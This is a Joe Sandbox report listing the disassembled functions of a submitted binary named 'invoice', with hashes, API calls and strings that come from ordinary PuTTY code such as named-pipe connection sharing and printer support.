Opcode ID: 5ae68ba3facddc708ed9b1d4a39c38a28c5c144e0cbe43a9beb4db021d11ac0b
Instruction ID: 70f0609f3f2a9b0df52020095eeea148933a4f86d46e74d45c847d85b7adad6b
Opcode Fuzzy Hash: 5ae68ba3facddc708ed9b1d4a39c38a28c5c144e0cbe43a9beb4db021d11ac0b
Instruction Fuzzy Hash: E7E08C78F0AB40AAFF182324A9453C826A05711B00F19407EC40A83BB0EBBD97838FC0

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDD8788 Relevance: 1.5, Strings: 1, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 000000013FDD8980

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 5c4914512b9f68734336ae4fc168d5558b95f73d1f016b41b7275cef26805c3e
Instruction ID: f1e7a7dbcd9ad8fd0ad333e87c3a1f740171ae2ac9d76d5d5066e697390c7d35
Opcode Fuzzy Hash: 5c4914512b9f68734336ae4fc168d5558b95f73d1f016b41b7275cef26805c3e
Instruction Fuzzy Hash: 79710432F2020086EA7E9BE6A6487EE22A1EF40B48F54153EFD41976F9C735CA47D341

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDD7A50 Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

0, xrefs: 000000013FDD7BF2

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: 11e67b13ce5deb46249ba7c1e29e26bc3c86698afc4b43aba58e83100347907c
Instruction ID: e6616df8f0a39b4181b89fe7b4f4586b78c646fb1e7d1ae1076993a6c3a13397
Opcode Fuzzy Hash: 11e67b13ce5deb46249ba7c1e29e26bc3c86698afc4b43aba58e83100347907c
Instruction Fuzzy Hash: CF614331B012404AFBB98AE9844C3EE6791EF81B84F2914BEFE409B7D9C625CB47C701

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FD6A4B2 Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

%u.%u.%u.%u, xrefs: 000000013FD6A682

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID:
String ID: %u.%u.%u.%u
API String ID: 0-1542503432
Opcode ID: c19bb7ea91ffdfca0d84598be25be53e982fce4440ab32ab89b39f8bdd01beee
Instruction ID: 971b498f13d34fe64d8a6c58b7cb9fb52319b3c1dd158cbf66b4d036a35d94c6
Opcode Fuzzy Hash: c19bb7ea91ffdfca0d84598be25be53e982fce4440ab32ab89b39f8bdd01beee
Instruction Fuzzy Hash: 3C41B236B0478445EA24EFA2D4697EE6361B7C5FA0F84403A9E8E47B96CE39C643C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDB3C6B Relevance: .5, Instructions: 493COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6038a74162232dc1ee457e3906ab293823ba66a80d99f8ef0df0b0afd961746
Instruction ID: d6cbbbbc87c6e6e27947d0820ca271706c6bab7293eb69523cad273e35d15083
Opcode Fuzzy Hash: a6038a74162232dc1ee457e3906ab293823ba66a80d99f8ef0df0b0afd961746
Instruction Fuzzy Hash: 2822C372A12B448AEB64CF68C4887AC73A4F759B94F269339DB4D57390EF35D992C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDD97C8 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d66fbc04690db421a358749692bb8a57c83cdeaedee17277d2ec75230c18dcc6
Instruction ID: 256fb78db2653efee8cf7e412af6303f0f03c9060257b2a712b4467eb1d2cbea
Opcode Fuzzy Hash: d66fbc04690db421a358749692bb8a57c83cdeaedee17277d2ec75230c18dcc6
Instruction Fuzzy Hash: CE915833B1429046FE6D4EA594583FA2690BF50798F14223DBE67477C4DA3ACB0BD702

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDD342F Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cb8e5855082970572e8d825ef94590c90aa1697a6a6015b3c32e540d6218d2c
Instruction ID: 6188035032477671a4784eb42f5a010a3ef3fc0ca087beb0f1384f29f00589fa
Opcode Fuzzy Hash: 4cb8e5855082970572e8d825ef94590c90aa1697a6a6015b3c32e540d6218d2c
Instruction Fuzzy Hash: FD51D3336156C09AD721CF65E4457DEBB61F796794F84C029FF891BB8ACA38C606CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FD66CC4 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6e0dbeed87094cfa215eddfb7d00457f460bbfaca57818c7a3104214982466a
Instruction ID: 1c10d56286adbab3e5064c53eb0039346f960b2a9fb34f396d654ae6c5e0dab8
Opcode Fuzzy Hash: b6e0dbeed87094cfa215eddfb7d00457f460bbfaca57818c7a3104214982466a
Instruction Fuzzy Hash: 6031483372269452FE998EA2E5087EA1695F308BE4FD8543DDE1E5B384EB39D607C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDDC4EC Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e200e1dd7b3059e131f1ab25fd36b0fb57340bb05742a64ada2b2b1551789a5
Instruction ID: 88fb26d221bf853ec25645068dad679c794f4f7887569700884858b927181bf6
Opcode Fuzzy Hash: 4e200e1dd7b3059e131f1ab25fd36b0fb57340bb05742a64ada2b2b1551789a5
Instruction Fuzzy Hash: F731B436E581C885F6BB59FD851C7ED1292EFC2340F64913DF10202ED9D932CB479601

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FD65E64 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2247a98c85738a12b4bc6e752dcdc046a5b543032f3b2807f4e94befaec5b46
Instruction ID: f1612f05b92949ab7422260f3cb7cae47852a7a48514d9d71743510006bb89ec
Opcode Fuzzy Hash: b2247a98c85738a12b4bc6e752dcdc046a5b543032f3b2807f4e94befaec5b46
Instruction Fuzzy Hash: 79019C73F5A2D903FD5609B457247E90B90072B3F4FC9233AAE6903BC3A10606CB8000

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCD2FC Relevance: 42.1, APIs: 14, Strings: 10, Instructions: 125filestringpipeCOMMON

Download Yara Rule

APIs

strchr.LIBVCRUNTIME ref: 000000013FDCD356
CreateFileA.KERNEL32 ref: 000000013FDCD3B5
GetLastError.KERNEL32 ref: 000000013FDCD3BD
WaitNamedPipeA.KERNEL32 ref: 000000013FDCD3D0
GetLastError.KERNEL32 ref: 000000013FDCD3D7

Part of subcall function 000000013FDDFF98: _set_error_mode.LIBCMT ref: 000000013FDDFFBF

Part of subcall function 000000013FDCE818: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,000000013FDCD3F5), ref: 000000013FDCE858
Part of subcall function 000000013FDCE818: OpenProcess.KERNEL32(?,?,?,?,?,?,?,000000013FDCD3F5), ref: 000000013FDCE86A
Part of subcall function 000000013FDCE818: GetLastError.KERNEL32(?,?,?,?,?,?,?,000000013FDCD3F5), ref: 000000013FDCE8BB
Part of subcall function 000000013FDCE818: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,000000013FDCD3F5), ref: 000000013FDCE8E0
Part of subcall function 000000013FDCE818: GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,000000013FDCD3F5), ref: 000000013FDCE912
Part of subcall function 000000013FDCE818: CopySid.ADVAPI32(?,?,?,?,?,?,?,000000013FDCD3F5), ref: 000000013FDCE936
Part of subcall function 000000013FDCE818: CloseHandle.KERNEL32 ref: 000000013FDCE95C
Part of subcall function 000000013FDCE818: CloseHandle.KERNEL32 ref: 000000013FDCE96C
Part of subcall function 000000013FDCE818: LocalFree.KERNEL32(?,?,?,?,?,?,?,000000013FDCD3F5), ref: 000000013FDCE97A

CloseHandle.KERNEL32 ref: 000000013FDCD43C
GetLastError.KERNEL32 ref: 000000013FDCD442

Part of subcall function 000000013FDCA0FC: FormatMessageA.KERNEL32 ref: 000000013FDCA1A7

CloseHandle.KERNEL32 ref: 000000013FDCD47C
GetLastError.KERNEL32 ref: 000000013FDCD482
EqualSid.ADVAPI32 ref: 000000013FDCD4CE
LocalFree.KERNEL32 ref: 000000013FDCD4DD
CloseHandle.KERNEL32 ref: 000000013FDCD4E8
LocalFree.KERNEL32 ref: 000000013FDCD4F3

Strings

Unable to get named pipe security information: %s, xrefs: 000000013FDCD44F
strchr(pipename + 9, '\\') == NULL, xrefs: 000000013FDCD360
strncmp(pipename, "\\\\.\\pipe\\", 9) == 0, xrefs: 000000013FDCD334
Error waiting for named pipe '%s': %s, xrefs: 000000013FDCD3E4
Owner of named pipe '%s' is not us, xrefs: 000000013FDCD4F9
*hw, xrefs: 000000013FDCD387
../windows/winnpc.c, xrefs: 000000013FDCD33B, 000000013FDCD367
\\.\pipe\, xrefs: 000000013FDCD31E
Unable to get user SID: %s, xrefs: 000000013FDCD48F
Unable to open named pipe '%s': %s, xrefs: 000000013FDCD465

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: CloseErrorHandleLast$Local$Free$Process$AllocCopyCreateCurrentEqualFileFormatLengthMessageNamedOpenPipeWait_set_error_modestrchr
String ID: *hw$../windows/winnpc.c$Error waiting for named pipe '%s': %s$Owner of named pipe '%s' is not us$Unable to get named pipe security information: %s$Unable to get user SID: %s$Unable to open named pipe '%s': %s$\\.\pipe\$strchr(pipename + 9, '\\') == NULL$strncmp(pipename, "\\\\.\\pipe\\", 9) == 0
API String ID: 705703100-3912106968
Opcode ID: 316c43f8a01ef9149928161f7ef8271e29603722d1eae245bd71a2533f8a8c14
Instruction ID: 99b9f64879a33b32c24aa3230c3fdc489572c424631d96537ad04cd8f81be93d
Opcode Fuzzy Hash: 316c43f8a01ef9149928161f7ef8271e29603722d1eae245bd71a2533f8a8c14
Instruction Fuzzy Hash: BE518B34A04A41A5FE10EBA2EC587D96361AB85BA0F454239ED6E477E9EF3CC747C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCF530 Relevance: 37.0, APIs: 14, Strings: 7, Instructions: 201synchronizationCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,?,00000000,?,000000013FD9F4CE), ref: 000000013FDCF73F

Part of subcall function 000000013FDCE9AE: LocalAlloc.KERNEL32 ref: 000000013FDCEA8D
Part of subcall function 000000013FDCE9AE: InitializeSecurityDescriptor.ADVAPI32 ref: 000000013FDCEAA4
Part of subcall function 000000013FDCE9AE: SetSecurityDescriptorOwner.ADVAPI32 ref: 000000013FDCEABC
Part of subcall function 000000013FDCE9AE: SetSecurityDescriptorDacl.ADVAPI32 ref: 000000013FDCEAD5

CreateMutexA.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,?,00000000,?,000000013FD9F4CE), ref: 000000013FDCF5CD
LocalFree.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,?,00000000,?,000000013FD9F4CE), ref: 000000013FDCF5FB
LocalFree.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,?,00000000,?,000000013FD9F4CE), ref: 000000013FDCF602
WaitForSingleObject.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,?,00000000,?,000000013FD9F4CE), ref: 000000013FDCF60C
ReleaseMutex.KERNEL32 ref: 000000013FDCF72E
CloseHandle.KERNEL32 ref: 000000013FDCF737
GetLastError.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,?,00000000,?,000000013FD9F4CE), ref: 000000013FDCF772
LocalFree.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,?,00000000,?,000000013FD9F4CE), ref: 000000013FDCF7B0
LocalFree.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,?,00000000,?,000000013FD9F4CE), ref: 000000013FDCF7B7
ReleaseMutex.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,?,00000000,?,000000013FD9F4CE), ref: 000000013FDCF7FC
CloseHandle.KERNEL32 ref: 000000013FDCF805
ReleaseMutex.KERNEL32 ref: 000000013FDCF833
CloseHandle.KERNEL32 ref: 000000013FDCF83C

Strings

../windows/winshare.c, xrefs: 000000013FDCF709
Local\putty-connshare-mutex, xrefs: 000000013FDCF56E
%s: %s, xrefs: 000000013FDCF669, 000000013FDCF6CA
*logtext || *ds_err || *us_err, xrefs: 000000013FDCF702
\\.\pipe\putty-connshare, xrefs: 000000013FDCF612
CreateMutex("%s") failed: %s, xrefs: 000000013FDCF77F
Unable to call CryptProtectMemory: %s, xrefs: 000000013FDCF74C

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: Local$FreeMutex$CloseDescriptorHandleReleaseSecurity$ErrorLast$AllocCreateDaclInitializeObjectOwnerSingleWait
String ID: %s: %s$*logtext || *ds_err || *us_err$../windows/winshare.c$CreateMutex("%s") failed: %s$Local\putty-connshare-mutex$Unable to call CryptProtectMemory: %s$\\.\pipe\putty-connshare
API String ID: 2978697931-3116618899
Opcode ID: 30414695dbbbf2fa2b0bab221339537d975821af100b15535d7d228251d3fb9f
Instruction ID: 271cb85b3b89711cb87cbeea9b78734498013fd84c63717250e2f38a596b7738
Opcode Fuzzy Hash: 30414695dbbbf2fa2b0bab221339537d975821af100b15535d7d228251d3fb9f
Instruction Fuzzy Hash: F6812B36A05A4485EE10EB62E9593ED63A1BB96FD0F454039DE4E0BBA5EF3CC647C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FD726EE Relevance: 36.2, APIs: 24, Instructions: 158COMMON

Download Yara Rule

APIs

BeginPaint.USER32 ref: 000000013FD72752
SelectObject.GDI32 ref: 000000013FD7276C
GetStockObject.GDI32 ref: 000000013FD72773
SelectObject.GDI32 ref: 000000013FD7277F
CreateSolidBrush.GDI32 ref: 000000013FD72787
SelectObject.GDI32 ref: 000000013FD72796
GetClientRect.USER32 ref: 000000013FD727A8
Rectangle.GDI32 ref: 000000013FD727C2
GetWindowTextLengthA.USER32 ref: 000000013FD727CB
GetWindowTextA.USER32 ref: 000000013FD727F7
SetTextColor.GDI32 ref: 000000013FD72806
SetBkColor.GDI32 ref: 000000013FD72815
TextOutA.GDI32 ref: 000000013FD72832
SelectObject.GDI32 ref: 000000013FD72848
DeleteObject.GDI32 ref: 000000013FD72851
EndPaint.USER32 ref: 000000013FD7285F
CreateCompatibleDC.GDI32 ref: 000000013FD7287E
SelectObject.GDI32 ref: 000000013FD72891
GetTextExtentPoint32A.GDI32 ref: 000000013FD728B0
SetWindowPos.USER32 ref: 000000013FD728DC
InvalidateRect.USER32 ref: 000000013FD728EA
DeleteDC.GDI32 ref: 000000013FD728F3
DefWindowProcA.USER32 ref: 000000013FD72927

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: Object$SelectText$Window$ColorCreateDeletePaintRect$BeginBrushClientCompatibleExtentInvalidateLengthPoint32ProcRectangleSolidStock
String ID:
API String ID: 1380534401-0
Opcode ID: 07e2992077a4d6026a206134d29e2057a9b4d8161777106f26a416c3cceab442
Instruction ID: f9256d6beafb38f980ffb76f3543820d21423efff4cac0d143e82380f8699537
Opcode Fuzzy Hash: 07e2992077a4d6026a206134d29e2057a9b4d8161777106f26a416c3cceab442
Instruction Fuzzy Hash: F1519139B006449AFA14EB66EC147AA7361F789BE1F45413ECD4A07B64EF3DC64B8B01

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCE1D2 Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 59libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 000000013FDC9F02: GetSystemDirectoryA.KERNEL32 ref: 000000013FDC9F1E
Part of subcall function 000000013FDC9F02: GetSystemDirectoryA.KERNEL32 ref: 000000013FDC9F71
Part of subcall function 000000013FDC9F02: LoadLibraryA.KERNEL32 ref: 000000013FDC9F9E

GetProcAddress.KERNEL32(?,?,00000000,00000000,000000013FDCDFB9,?,?,?,?,?,?,000000013FD5A8D4), ref: 000000013FDCE21A
GetProcAddress.KERNEL32(?,?,00000000,00000000,000000013FDCDFB9,?,?,?,?,?,?,000000013FD5A8D4), ref: 000000013FDCE22D
GetProcAddress.KERNEL32(?,?,00000000,00000000,000000013FDCDFB9,?,?,?,?,?,?,000000013FD5A8D4), ref: 000000013FDCE240
GetProcAddress.KERNEL32(?,?,00000000,00000000,000000013FDCDFB9,?,?,?,?,?,?,000000013FD5A8D4), ref: 000000013FDCE253
GetProcAddress.KERNEL32(?,?,00000000,00000000,000000013FDCDFB9,?,?,?,?,?,?,000000013FD5A8D4), ref: 000000013FDCE266
GetProcAddress.KERNEL32(?,?,00000000,00000000,000000013FDCDFB9,?,?,?,?,?,?,000000013FD5A8D4), ref: 000000013FDCE279
GetProcAddress.KERNEL32(?,?,00000000,00000000,000000013FDCDFB9,?,?,?,?,?,?,000000013FD5A8D4), ref: 000000013FDCE28C
GetProcAddress.KERNEL32(?,?,00000000,00000000,000000013FDCDFB9,?,?,?,?,?,?,000000013FD5A8D4), ref: 000000013FDCE29F

Strings

OpenPrinterA, xrefs: 000000013FDCE223
EnumPrintersA, xrefs: 000000013FDCE209
EndPagePrinter, xrefs: 000000013FDCE282
ClosePrinter, xrefs: 000000013FDCE236
StartPagePrinter, xrefs: 000000013FDCE26F
WritePrinter, xrefs: 000000013FDCE295
StartDocPrinterA, xrefs: 000000013FDCE249
EndDocPrinter, xrefs: 000000013FDCE25C
spoolss.dll, xrefs: 000000013FDCE1F4
winspool.drv, xrefs: 000000013FDCE1E5

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: AddressProc$DirectorySystem$LibraryLoad
String ID: ClosePrinter$EndDocPrinter$EndPagePrinter$EnumPrintersA$OpenPrinterA$StartDocPrinterA$StartPagePrinter$WritePrinter$spoolss.dll$winspool.drv
API String ID: 1565920424-2130675966
Opcode ID: 89f421f7abde09ed647dcc18f7e7fd58654a8e0f091df57834e6ae84f8e5a881
Instruction ID: e723a208a2544ff058a216b7e0887bc483e2016e8760850fff9de49b1018bcc6
Opcode Fuzzy Hash: 89f421f7abde09ed647dcc18f7e7fd58654a8e0f091df57834e6ae84f8e5a881
Instruction Fuzzy Hash: 8521C478A06B54A9FA45EB26FC403D973A8BB48780F52513EC84942BB4FF6C8397C701

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCE670 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 000000013FDCE6B5
GetProcAddress.KERNEL32 ref: 000000013FDCE6E2
GetProcAddress.KERNEL32 ref: 000000013FDCE70F
GetProcAddress.KERNEL32 ref: 000000013FDCE73C
GetProcAddress.KERNEL32 ref: 000000013FDCE769
GetProcAddress.KERNEL32 ref: 000000013FDCE78E
GetProcAddress.KERNEL32 ref: 000000013FDCE7B3

Strings

SetEntriesInAclA, xrefs: 000000013FDCE7AC
